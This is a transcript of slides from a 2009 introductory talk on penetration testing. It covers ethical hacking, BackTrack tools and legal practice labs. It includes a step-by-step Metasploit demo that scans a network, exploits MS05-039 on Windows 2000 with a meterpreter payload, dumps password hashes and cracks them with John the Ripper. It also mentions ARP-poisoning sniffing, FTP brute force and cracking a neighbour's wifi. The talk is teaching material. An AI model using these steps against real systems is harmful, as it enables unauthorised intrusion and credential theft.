Hack Attack! An Introduction to Penetration Testing
7 likes4,188 views
This document provides an introduction to penetration testing and ethical hacking. It discusses how hacking can be done ethically through penetration testing with permission. It outlines the stages of a hacker's skills from script kiddie to uberhacker. Popular programming languages for creating hacking tools like C, Python, and Ruby are also mentioned. The document demonstrates some hacking tools in BackTrack Linux like sniffing passwords with Ettercap and bruteforcing FTP passwords with Hydra. It emphasizes how virtualization allows one to practice hacking legally and provides further learning resources.
![DEMO: Pwning Win2k
● Create database (or connect to existing)
– db_create [optional_database_name]
● Find win2k box using nmap (in metasploit)
– db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
● Search Metasploit for win2k exploits
– search 2000
● Use exploit w/meterpreter
– use exploit/windows/smb/ms05_039_pnp
– set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?
– show options](https://image.slidesharecdn.com/stevephillips-talk-hackattacksblug-091226025919-phpapp01/85/Hack-Attack-An-Introduction-to-Penetration-Testing-14-320.jpg)
![DEMO: Pwning Win2k
● Set parameters
– set RHOST [target_ip]
● Now we exploit! Can you guess the command?
– exploit
● Get hashes
– hashdump
– This would be much harder without meterpreter!
● Copy and paste hashes into new text file
● Crack hashes with john the ripper
– ./john [file_containing_hashes].txt
● Game Over](https://image.slidesharecdn.com/stevephillips-talk-hackattacksblug-091226025919-phpapp01/85/Hack-Attack-An-Introduction-to-Penetration-Testing-15-320.jpg)
Hack Attack! An Introduction to Penetration Testing
- 1. Hack Attack! An Introduction to Penetration Testing Steve Phillips (aka fraktil) 2009.12.17 @ SBLUG
- 2. Who Am I? ● Attended UCSB 2004-2008 – Majored in Math and Philosophy, not CS ● Started using Linux in 2001 – Mandrake, then Slackware, then Debian ● Applying for penetration testing job in January ● Biases/“Preferences” – Linux > Windoze (duh) – Python > Ruby – Emacs > vi – Debian (and variants) > others
- 3. Can Hacking Be Ethical? Or, what is Ethical Hacking? ● Black Hat – Compromises computer systems without permission – Criminal ● White Hat, aka Ethical Hacker – Gets paid to hack – legally (friggin' sweet) – Always gets permission before attacking a system ● Gray Hat – Some combination of Black and White
- 4. The Stages of Hackerdom ● Script Kiddie (“skiddie”) – Can only run automated tools – Doesn't understand underlying technology ● Advanced Beginner – Mastered advanced features of many tools – Knows enough programming to create own tools ● C => Python, Ruby (see next slide) ● Uberhacker – Discovers new vulnerabilities (or new types of vulns) – Knows Assembly, C, Python and/or Ruby, SQL – Excellent programmer; writes tools, scripts regularly – Can defend as well as attack (firewalls, IDS, etc)
- 5. Programming Languages Used to Create Hacking Tools ● C – Nmap (network mapper, portscanner, more) – Nessus (vulnerability detection) – Wireshark (network sniffer) ● Python – w3af (web app attack framework) – sqlmap (automatic SQL injection) – TheMiddler (session hijacking, targeted pw sniffing) ● Ruby – Metasploit (vuln exploitation, much more)
- 6. What About in Back|Track 4? Overall: Tools + Exploits ● File count: find /pentest | grep .c$ | wc -l ● Line count: cat $(find /pentest | grep .c$) | wc -l ● C: 4058 .c files 1,300,000 lines ● Python: 2431 .py files 612,000 lines ● Ruby: 5468 .rb files 694,000 lines ● 2773 files from Metasploit ● 1271 files from Dradis (information organizing, sharing) ● 1424 other ● C++: 431 .cpp files 144,000 lines
- 7. What About in Back|Track 4? Exploits Only (from exploitdb) ● C – 1321 .c files ● Python – 405 .py files ● Ruby – 146 .rb files ● C++ – 110 .cpp files
- 8. TIOBE Index Programming Language Popularity
- 9. Back|Track 4 Categories ● Information Gathering – Email addresses, DNS ● Network Mapping ● Vulnerability Identification ● Web Application Analysis ● Radio Network Analysis ● Penetration (not that kind)
- 10. Back|Track 4 Categories ● Privilege Escalation ● Maintaining Access ● Digital Forensics ● Reverse Engineering ● VoIP (Voice over Internet Protocol) ● Misc
- 11. DEMO: Sniffing Passwords with Ettercap ● ARP Poisoning for MitM Attack – Associate attacker's MAC with router's IP – Target tries to route traffic through router ● Routes it through attacker instead – Attacker forwards traffic both ways – Attacker can silently watch or inject traffic ● TheMiddler, sslstrip
- 12. How Else Can We Get Creds? ● Phishing – Via email ● Spear Phishing – Becoming popular – Very hard to stop ● In-person Social Engineering – Kevin Mitnick is famous for this ● Brute force
- 13. DEMO: Bruteforcing FTP ● Using Hydra to bruteforce weak FTP password – Well, really a dictionary attack
- 14. DEMO: Pwning Win2k ● Create database (or connect to existing) – db_create [optional_database_name] ● Find win2k box using nmap (in metasploit) – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24 ● Search Metasploit for win2k exploits – search 2000 ● Use exploit w/meterpreter – use exploit/windows/smb/ms05_039_pnp – set PAYLOAD windows/meterpreter/bind_tcp ● Which parameters still need to be set? – show options
- 15. DEMO: Pwning Win2k ● Set parameters – set RHOST [target_ip] ● Now we exploit! Can you guess the command? – exploit ● Get hashes – hashdump – This would be much harder without meterpreter! ● Copy and paste hashes into new text file ● Crack hashes with john the ripper – ./john [file_containing_hashes].txt ● Game Over
- 16. Why Become an Ethical Hacker? ● Field is growing (see next slide) – New laws, regulations – US government falling behind in cyber security ● You get paid to hack – need I say more? – Banks – Telecoms – Casinos – Foreign countries (for the federal gov't)
- 18. How Can I Practice Legally? ● Virtualization (VMware, VirtualBox) – Use virtual images from recent CTF competitions ● http://lampsecurity.org/capture-the-flag-6 ● http://ctf.hcesperer.org/25c3ctf ● http://ctf.hcesperer.org/daopen08 ● http://ctf.hcesperer.org/eh08ctf ● NetWars – Part of government's Cyber Defense Initiative 2009 ● DVL: Damn Vulnerable Linux – Purposely misconfigured, exploitable – http://tinyurl.com/dvllinux15
- 19. Further Resources Learning ● Metasploit – Online Class: http://www.offensive- security.com/metasploit-unleashed/ ● Nmap Guide – http://nmap.org/book/man.html ● Security Videos, Tutorials – http://securitytube.net
- 20. Tools Added to Back|Track Extra Tools I Used ● Metasploit 3.3.2 (updated) ● Nmap 5.0 (updated) ● Exploitdb archive (/pentest/exploits/exlpoitdb)
- 21. Summary ● Hacking can be ethical ● “Computer security” is an oxymoron – No one is safe ● REALLY powerful hacking tools exist ● Metasploit is effing dangerous
- 22. Future Demos? ● More local fun – Crack neighbor's wifi (WEP) – Exploit remote vuln in DD-WRT firmware – Redirecting traffic using fake DNS server – Intercepting Twitter, Facebook, LinkedIn creds ● More like real pen testing – SQL injection – XSS – Nessus scan
- 23. Contact Information ● Name: Steve Phillips ● New Blog: SweetHack.blogspot.com ● Email: [email protected] ● Twitter: twitter.com/fraktil ● LinkedIn: linkedin.com/in/sdphillips ● IRC: fraktil in #sblug on borg-cube.com
- 24. Questions?